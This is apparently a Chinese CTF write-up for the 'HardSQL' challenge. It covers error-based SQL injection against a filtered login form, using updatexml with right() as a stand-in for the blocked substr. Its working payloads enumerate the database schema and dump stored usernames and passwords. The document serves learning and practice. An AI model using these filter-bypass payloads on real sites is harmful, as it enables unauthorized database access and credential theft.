[极客大挑战 2019]HardSQL

不要再逮了

先随便试一下

68999b6808c44d4bb5bc499ec5577185.png

d0e6d7232f7d4b65985ae921d31f0f50.png

这里有报错,可以试试报错注入

抓个包,测测闭合方式

17ba70ad90214e6c8a75d7586ab87994.png

闭合方式为单引号。

然后我试了很多and 1=1 --+ ,order by 4 --+。都出现:

a87215c848004372990b5c63b45b92b3.png

可以看出,做了过滤。

先用字典试一下,它的过滤字段

378679f897764fc5ab83561b07943a41.png

a5c1e4bf60b64949bf7822c72ec976eb.png

response是被过滤的页面,所以长度为789的都是被过滤的字段

4ff477f696b74523b5a2315dae27930a.png

联合注入(union),布尔盲注(ascii),时间注入(sleep)都不能用了。

但是,正如我们猜测的,报错注入但是。。。。substr被过滤了。

没有了截取函数。我们就要找到另一个函数代替-----right()从右边截取函数

right(str,length)
str:字符串
length:个数

 

213'or(updatexml(1,concat(0x7e,database()),1))#

c33708f5ca974af192fb9be2176d988c.png

213'or(updatexml(1,concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata))),1))#

758b8bb364c9414ebea91663d0d7b224.png

213'or(updatexml(1,right(concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata))),40),1))#

76c540b9ba9f4d0a8f600fb591689e77.png

213'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like("geek")))),1))#

32d5f7b96d004c59bad5ba8e37638022.png

213'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like("H4rDsq1")))),1))#

f38369a0918b4a7796c059bd5e51361f.png

213'or(updatexml(1,concat(0x7e,(select(group_concat(username,":",password))from(H4rDsq1))),1))#

c0f8c06201824c1ca2f4b3143acbf755.png

 

213'or(updatexml(1,right(concat(0x7e,(select(group_concat(username,":",password))from(H4rDsq1))),40),1))#

135ce5abf1ff49e1a2c0e6f08cb87bcc.png

 

 

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值